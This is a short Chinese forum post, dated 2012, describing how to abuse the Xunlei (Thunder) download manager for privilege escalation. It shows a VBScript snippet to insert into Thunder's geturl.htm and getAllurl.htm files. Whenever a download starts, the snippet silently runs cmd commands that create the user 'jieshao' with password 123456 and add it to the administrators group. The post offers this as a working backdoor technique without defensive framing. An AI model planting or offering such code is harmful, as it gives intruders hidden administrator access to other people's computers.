黑客是如何利用迅雷下载执行cmd命令提权

[复制链接]
查看1197 | 回复0 | 2012-4-1 19:26:26 | 显示全部楼层 |阅读模式
当使用迅雷下载东西的时候,会调用安装迅雷后一个htm文件,去激活htm文件里的一些代码,把所下载东西添加到列表当中。
所对应的htm文件有2处一处是C:\ProgramFiles\ThunderNetwork\Thunder\Program\geturl.htm
一处是C:\ProgramFiles\ThunderNetwork\Thunder\Program\getAllurl.htm
如果想把想要的代码添加进去执行了?
简单写个代码试试,代码如下:
<scriptlanguage="VBScript">
Setvbs=CreateObject("Wscript.Shell")
vbs.run"cmd/cnetuserjieshao123456/add",0
vbs.run"cmd/cnetlocalgroupadministratorsjieshao/add",0
</script>
如果把这段代码添加到那2个htm文件里,当迅雷下载东西的时候,一样会去执行代码。添加一个administrators组的一个用户jieshao,代码可以自定义。
发帖前要善用论坛搜索功能,那里可能会有你要找的答案或者已经有人发布过相同内容了,请勿重复发帖。
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则